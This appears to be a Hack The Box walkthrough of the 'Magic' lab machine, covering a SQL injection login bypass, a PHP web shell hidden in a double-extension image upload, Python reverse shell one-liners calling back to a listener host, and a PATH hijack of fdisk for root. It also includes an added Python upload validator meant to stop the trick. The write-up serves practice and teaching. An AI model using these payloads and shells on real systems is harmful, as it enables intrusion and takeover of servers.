Magic HacktheBox Walkthrough


Table Of Content

1. Portscan
2. USER
    2.1 Web Enumeration
    2.2 SQL Injection
    2.3 File Upload
    2.4 Initial Shell
    2.5 User Flag
3. ROOT

Scripts/Tools Used:

1. nmap: https://nmap.org/download.html
2. Burpsuite: https://portswigger.net/burp/communitydownload
3. pspy64: https://github.com/DominicBreuker/pspy

1. Portscan

The nmap port scan result shows that two ports are open:

2. USER

2.1 Web Enumeration

I started my enumeration with port 80, as nothing else of interest turned up in the port scan. The site shows random floating pictures.
The information I gathered from the source code and gobuster is:
1. a login.php page.
2. the /images/uploads directory.

2.2 SQL Injection

The login.php portal is vulnerable to a simple SQL injection attack. The login can be bypassed with a simple payload:

username: ' OR '1'='1
password: ' OR '1'='1

2.3 File Upload

After bypassing the login page, there is an image upload portal. With the help of Burp Suite, I tried to inject PHP code inside an image file.
The portal only allows uploads of files with an image extension, such as img.jpg, img.png or img.jpeg.

To make the attack work, I named the file grandhack.php.png and removed most of the image's bytes, leaving enough of the magic bytes to keep the file's image signature intact. Finally, I appended the PHP code for command execution.

PHP code: <?php echo system($_REQUEST['cmd']); ?>
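What the upload handler should have verified, as an added example that is not part of the original walkthrough: a Python validator that refuses the grandhack.php.png trick in three independent ways (every extension in the name is checked, not just the last one; the leading bytes must match the claimed image type; and the body is scanned for PHP open tags). The allow-list and the sample files below are constructed for this example.

```python
import re
from pathlib import PurePosixPath

# Allowed final extensions and the magic bytes each must start with (constructed allow-list).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# Server-side executable extensions refused anywhere in the name, so x.php.png is rejected.
DANGEROUS = {".php", ".php5", ".phtml", ".phar"}
# A file with a valid image header that still carries a PHP open tag is a polyglot.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename, data):
    """Return (accepted, reason) for one candidate upload."""
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes:
        return False, "no extension"
    if any(s in DANGEROUS for s in suffixes):
        return False, f"executable extension in name: {filename}"
    ext = suffixes[-1]
    if ext not in MAGIC:
        return False, f"extension not allowed: {ext}"
    if not data.startswith(MAGIC[ext]):
        return False, f"magic bytes do not match {ext}"
    if PHP_TAG.search(data):
        return False, "PHP open tag found inside image data"
    return True, "ok"


def triage(samples):
    """Run check_upload over a {name: bytes} mapping; return {name: reason} for rejects."""
    rejected = {}
    for name, data in samples.items():
        ok, reason = check_upload(name, data)
        if not ok:
            rejected[name] = reason
    return rejected


# Constructed sample uploads: a clean PNG, a clean JPEG, and three variants of the
# trick described above (double extension, tag after a real header, no header at all).
PNG_HDR = b"\x89PNG\r\n\x1a\n"
SAMPLES = {
    "holiday.png": PNG_HDR + b"\x00\x00\x00\rIHDR" + b"\x00" * 16,
    "cat.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 8,
    "greathack.php.png": PNG_HDR + b"<?php echo 'hi'; ?>",
    "photo.png": PNG_HDR + b"\x00" * 4 + b"<?= 'hi' ?>",
    "notes.png": b"<?php echo 'hi'; ?>",
}
```

The same triage function can be pointed at an existing uploads directory to find polyglots that were accepted before the checks were in place.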

2.4 Initial Shell 

Using nc as the listener and the Python reverse shell one-liner passed in the cmd parameter, I grabbed the initial shell as www-data:
http://10.10.10.185/images/uploads/greathack.php.png?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.21",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

2.5 User Flag

Under /var/www/Magic, I found the db.php5 file, which contains the database credentials for theseus.

With mysqldump I dumped the database content and found the valid password of theseus. Then I simply switched to theseus using .

3. ROOT

LinPEAS (linpeas.sh) revealed that sysinfo can be used to escalate privileges.

Whenever sysinfo is executed by theseus, other commands such as fdisk and lshw also get executed with root privileges.

So, in order to exploit this, I created an fdisk file in the tmp/labstore/ directory. The code inside fdisk is the same as the one used for the initial shell.
Code inside fdisk:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.21",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then, I made it executable with chmod.

Now, it's important that the custom-created fdisk file is picked up instead of the default one. To achieve this, I changed the PATH variable to point to the current directory.

And that's how the magic ends.

References:
1. Reverse shell: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
2. mysqldump: https://www.configserverfirewall.com/mysqladmin/mysqldump-mysql-database-backup-examples/
Thanks for reading.